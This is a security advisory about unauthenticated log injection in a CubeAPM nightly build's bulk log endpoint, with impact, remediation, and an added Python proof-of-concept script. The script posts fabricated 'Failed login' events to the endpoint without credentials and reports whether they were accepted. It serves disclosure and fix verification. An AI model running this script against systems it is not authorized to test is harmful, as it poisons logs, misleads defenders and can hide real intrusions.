CubeAPM Unauthenticated Log Injection Vulnerability
Vulnerability
A log injection vulnerability has been identified in CubeAPM version nightly-2025-08-01-1. The /api/logs/insert/elasticsearch/_bulk endpoint accepts bulk log data without authentication or input validation, so any remote attacker who can reach it can write arbitrary log entries into the log store of the monitored environment. Exploitation could result in false log entries, log poisoning, obfuscation of alerts, and degraded performance of the observability pipeline.
Impact
Exploitation lets an attacker plant false log entries that mislead monitoring systems and analysts. Injected data can corrupt dashboards and any metrics derived from logs, degrading detection of and response to real incidents, and can bury genuine indicators of compromise in attacker-controlled noise. A high volume of unauthenticated writes can also overload the logging pipeline, causing a denial-of-service condition.
Reproduction
To reproduce this vulnerability, send an unauthenticated POST request to the /api/logs/insert/elasticsearch/_bulk endpoint with bulk log data in the request body, formatted as ndjson (one JSON object per line). On an affected version the injected log entries are accepted and processed by the CubeAPM observability pipeline. Only run this against an instance you are authorized to test, and tag the entries you send so they can be located and purged afterwards.
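The request described above, as an added example that is not part of the original advisory and not CubeAPM project code: a Python script that builds an Elasticsearch-style _bulk body, posts it with no credentials, and interprets the HTTP status. The assumptions are that the endpoint accepts the standard Elasticsearch bulk layout (an action line followed by a document line, every line newline-terminated), that document field names such as message, severity and service are accepted as-is (CubeAPM may use different names), and that the target base URL is supplied on the command line. The status interpretation doubles as a check after upgrading to nightly-2025-09-19-1: the page does not state what a fixed build returns, so a 401/403 is treated as "rejected" and anything else as "unknown".

```python
"""Unauthenticated bulk log injection probe for CubeAPM (added example).

Not CubeAPM code. Assumptions: standard Elasticsearch _bulk ndjson layout,
illustrative field names, and a base URL given as the first argument.
"""
import json
import sys
import time
import urllib.error
import urllib.request
import uuid

ENDPOINT = "/api/logs/insert/elasticsearch/_bulk"


def build_bulk_body(docs):
    """Serialize documents into Elasticsearch _bulk ndjson.

    Each document is preceded by an {"index":{}} action line; the body must
    end with a newline or bulk parsers silently drop the final record.
    """
    lines = []
    for doc in docs:
        lines.append(json.dumps({"index": {}}, separators=(",", ":")))
        lines.append(json.dumps(doc, separators=(",", ":")))
    return ("\n".join(lines) + "\n").encode("utf-8")


def make_marked_docs(marker, count=3):
    """Constructed sample log entries, each tagged with `marker` so the test
    data can be found and purged later. The fake failed-login text illustrates
    how an attacker could plant misleading security events."""
    now = time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime())
    return [
        {
            "@timestamp": now,
            "service": "auth-service",          # assumed field name
            "severity": "ERROR",                # assumed field name
            "message": f"Failed login for user admin from 10.0.0.{i} ({marker})",
            "test_marker": marker,
        }
        for i in range(1, count + 1)
    ]


def classify_status(status):
    """Interpret the HTTP status of an unauthenticated bulk POST."""
    if status in (200, 201, 202, 204):
        return "vulnerable"   # entries accepted with no credentials
    if status in (401, 403):
        return "rejected"     # authentication/authorization enforced
    return "unknown"          # e.g. 404/5xx: inspect the body before concluding


def post_bulk(base_url, body, timeout=10):
    """POST the ndjson body with no Authorization header; return (status, text)."""
    req = urllib.request.Request(
        base_url.rstrip("/") + ENDPOINT,
        data=body,
        method="POST",
        headers={"Content-Type": "application/x-ndjson"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace")


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: probe.py http://<cubeapm-host>:<port>")
    marker = f"log-injection-test-{uuid.uuid4().hex[:8]}"
    status, text = post_bulk(sys.argv[1], build_bulk_body(make_marked_docs(marker)))
    print(f"HTTP {status} -> {classify_status(status)}; search logs for {marker}")
    print(text[:300])
```

After running it against an affected instance, search the CubeAPM logs UI for the printed marker: the fabricated "Failed login" events appearing under a service you never deployed is the poisoning the Impact section describes. Run the same script after upgrading; the unauthenticated request should no longer be accepted.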
Remediation
Update to CubeAPM version nightly-2025-09-19-1 or later. In addition, require authentication and authorization for all log ingestion endpoints, validate the structure of incoming bulk payloads, sanitize fields before they are rendered in dashboards, and restrict network access to the ingestion endpoints to the trusted collectors and services that are expected to ship logs.
